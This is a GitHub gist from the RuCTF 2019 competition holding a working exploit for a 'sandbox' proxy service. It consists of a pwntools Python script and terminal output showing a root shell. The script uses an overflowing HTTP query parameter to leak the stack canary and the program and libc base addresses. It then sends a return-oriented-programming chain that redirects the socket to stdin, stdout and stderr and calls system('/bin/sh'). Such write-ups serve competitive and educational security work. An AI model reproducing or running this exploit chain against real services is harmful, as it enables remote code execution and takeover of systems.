Skip to content

Instantly share code, notes, and snippets.

@v0s

v0s/README.md

Last active April 30, 2019 05:28
Show Gist options
  • Star 0 You must be signed in to star a gist
  • Fork 0 You must be signed in to fork a gist
  • Save v0s/1933e025dc61c2dfe32a61f79b959c11 to your computer and use it in GitHub Desktop.
Save v0s/1933e025dc61c2dfe32a61f79b959c11 to your computer and use it in GitHub Desktop.
Download ZIP
Sandbox ROP RCE (ructf 2019)
Raw
README.md

Sandbox RCE via ROP

root@kali:/mnt/hgfs/f/sandbox/proxy# ./sandbox_rce.py 
[+] Opening connection to 127.0.0.1 on port 16780: Done
[*] Closed connection to 127.0.0.1 port 16780
[+] Opening connection to 127.0.0.1 on port 16780: Done
Stack canary: 00667104293168fb proxy base: 0x5611dcb23000 libc base: 0x7ff23c8f9000
[*] Switching to interactive mode
foo\x00uuid\x0041414141414141414141414sh: turning off NDELAY mode
$ id
uid=0(root) gid=0(root) groups=0(root)
$ pwd
/root/proxy
$ ls -la
total 8140
drwxr-xr-x 1 root root      4096 Apr 29 21:49 .
drwx------ 1 root root      4096 Apr 29 21:45 ..
-rwxrwxrwx 1 root root        46 Apr 28 14:13 .gitignore
-rwxrwxrwx 1 root root       168 Apr 28 14:13 Dockerfile
-rwxrwxrwx 1 root root       494 Apr 28 14:13 Makefile
-rwxrwxrwx 1 root root       103 Apr 28 14:13 docker_build.sh
-rwxrwxrwx 1 root root       288 Apr 28 14:13 gen_hash.py
-rwxrwxrwx 1 root root        28 Apr 28 14:13 hash.h
-rwxrwxrwx 1 root root      8267 Apr 28 14:13 httpserver.cpp
-rwxrwxrwx 1 root root      4619 Apr 28 14:13 httpserver.h
-rwxrwxrwx 1 root root       569 Apr 28 14:13 interface.h
-rwxr-xr-x 1 root root   2030544 Apr 29 21:45 libc.so.6
-rwxrwxrwx 1 root root     30768 Apr 29 17:31 libinterface.so
-rwxrwxrwx 1 root root      4302 Apr 28 14:13 main.cpp
-rwxrwxrwx 1 root root    452976 Apr 28 14:20 proxy
$
Raw
sandbox_rce.py
#!/usr/bin/python
from pwn import *
host = args.HOST or "127.0.0.1"
port = args.PORT or "16780"
io = remote(host, port)
payload = "A"*52 + p32(4) + "A"*4 + p64(0x3ff)
io.send("POST /add_unit?mind=foo&uuid=" + enhex(payload).upper() + " HTTP/1.1\r\n"
+ "Host: 127.0.0.1:16780\r\n"
+ "User-Agent: curl/7.64.0\r\n"
+ "Accept: */*\r\n"
+ "Content-Length: 0\r\n"
+ "\r\n")
leak = io.recvrepeat(0x400)
io.close()
io = remote(host, port)
stack_canary = leak[0x48:0x50]
proxyBase = u64(leak[0x58:0x60]) - 0x3C3D
libcBase = u64(leak[0x2c8:0x2d0]) - 0x130EA6
print "Stack canary:", enhex(stack_canary), "proxy base:", hex(proxyBase), "libc base:", hex(libcBase)
rop = ""
rop += p64(libcBase + 0x0002155f)#: pop rdi ; ret ; (490 found)
rop += p64(4)
rop += p64(libcBase + 0x00023e6a)#: pop rsi ; ret ; (147 found)
rop += p64(0)
rop += p64(libcBase + 0x1109A0)#dup2
rop += p64(libcBase + 0x0002155f)#: pop rdi ; ret ; (490 found)
rop += p64(4)
rop += p64(libcBase + 0x00023e6a)#: pop rsi ; ret ; (147 found)
rop += p64(1)
rop += p64(libcBase + 0x1109A0)#dup2
rop += p64(libcBase + 0x0002155f)#: pop rdi ; ret ; (490 found)
rop += p64(4)
rop += p64(libcBase + 0x00023e6a)#: pop rsi ; ret ; (147 found)
rop += p64(2)
rop += p64(libcBase + 0x1109A0)#dup2
rop += p64(libcBase + 0x0002155f)#: pop rdi ; ret ; (490 found)
rop += p64(libcBase + 0x01B3E9A)#"/bin/sh"
rop += p64(libcBase + 0x4F440)#system
payload = "A"*52 + p32(4) + "A"*4 + p64(0) + stack_canary + "B"*8 + rop
io.send("POST /add_unit?mind=foo&uuid=" + enhex(payload).upper() + " HTTP/1.1\r\n"
+ "Host: 127.0.0.1:16780\r\n"
+ "User-Agent: curl/7.64.0\r\n"
+ "Accept: */*\r\n"
+ "Content-Length: 0\r\n"
+ "\r\n")
io.interactive()
@RuslanKutdusov
Copy link

Агонь!

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment